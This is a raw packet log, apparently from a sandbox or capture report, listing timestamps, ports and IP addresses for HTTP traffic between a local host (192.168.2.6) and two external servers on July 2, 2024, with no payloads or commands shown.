Jul 2, 2024 00:05:08.053221941 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.053224087 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053235054 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053245068 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053255081 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053256989 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.053265095 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053268909 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.053280115 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053289890 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053298950 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053314924 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053317070 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.053317070 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.053325891 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053335905 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053347111 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053354025 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.053354025 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.053358078 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053369045 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053380013 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053380966 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.053390026 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053400993 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053421021 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.053421021 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.053458929 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.053926945 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053937912 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053947926 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053958893 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053968906 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053981066 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053991079 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053996086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.053998947 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054006100 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054020882 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054023981 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054033995 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054044962 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054054976 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054064035 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054074049 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054075003 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054075003 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054085016 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054095984 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054101944 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054101944 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054105997 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054116964 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054126978 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054155111 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054217100 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054441929 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054454088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054505110 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054505110 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054536104 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054547071 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054558039 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054568052 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054579020 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054589987 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054589987 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054600000 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054610968 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054614067 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054637909 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054672003 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054682016 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054682016 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054691076 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054708004 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054718018 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054728031 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054738045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054748058 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054754019 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054757118 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054759979 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054759979 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054775000 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054785013 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054795027 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054804087 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054814100 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054815054 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054815054 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054820061 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054831028 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054841042 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054851055 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054861069 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054866076 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054871082 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.054884911 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054903030 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.054922104 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.055510998 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055521965 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055531025 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055541039 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055552006 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055558920 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.055567026 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055577040 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055588007 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055597067 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055603981 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.055607080 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055623055 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055633068 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055643082 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055653095 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055661917 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.055663109 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055672884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.055672884 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.055672884 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055684090 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055692911 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055701017 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.055708885 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055712938 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.055721045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.055742025 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.055766106 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.055766106 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056097031 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056107998 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056122065 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056132078 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056142092 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056147099 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056153059 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056163073 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056174040 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056181908 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056184053 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056189060 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056197882 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056202888 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056202888 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056210041 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056226969 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056232929 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056237936 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056248903 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056257963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056267977 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056278944 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056288958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056293011 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056293011 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056298018 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056308985 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056319952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056329012 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056330919 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056330919 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056339025 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056350946 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056360006 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056366920 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056370020 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056380987 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056389093 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056391001 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056402922 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056411028 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056421995 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056432009 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056432962 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.056444883 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056478024 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.056478024 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057024002 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057034969 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057044983 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057054996 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057065010 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057075977 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057085991 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057086945 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057086945 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057104111 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057113886 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057125092 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057135105 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057136059 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057145119 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057154894 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057166100 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057172060 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057172060 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057176113 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057187080 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057187080 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057187080 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057199001 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057209969 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057224989 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057224989 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057265043 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057545900 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057557106 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057566881 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057578087 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057589054 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057599068 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057599068 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057609081 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057620049 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057631016 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057638884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057638884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057641029 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057651043 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057653904 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057673931 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057684898 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057691097 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057691097 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057694912 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057706118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057715893 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057727098 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057729959 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057738066 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057749033 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057749033 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057758093 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057764053 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057764053 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057768106 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057779074 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057791948 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057794094 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057802916 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057806015 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057816029 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057826996 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057828903 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057837009 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057848930 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057858944 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057871103 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057873964 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057885885 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057895899 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.057903051 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057903051 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057921886 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.057934046 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058495045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058506012 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058518887 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058528900 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058538914 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058548927 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058558941 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058564901 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058574915 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058578968 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058584929 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058594942 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058607101 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058618069 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058618069 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058621883 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058634043 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058645010 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058655024 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058655024 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058665037 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058674097 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058677912 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058685064 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058695078 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058697939 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058697939 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058705091 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058715105 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058725119 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058737040 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058747053 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058753014 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058758020 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058768034 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058778048 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058788061 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058789968 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058789968 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058789968 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058799028 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058808088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058818102 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058830023 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058831930 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058840990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.058862925 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058862925 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.058892012 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.059889078 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.059900045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.059911966 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.059922934 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.059931993 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.059947014 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.059947014 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.059947968 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.059957981 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.059968948 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.059979916 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.059986115 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.059989929 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060000896 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060003996 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060010910 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060022116 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060026884 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060033083 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060043097 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060051918 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060051918 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060051918 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060062885 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.060079098 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060122013 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.060383081 CEST	80	49716	77.105.133.27	192.168.2.6
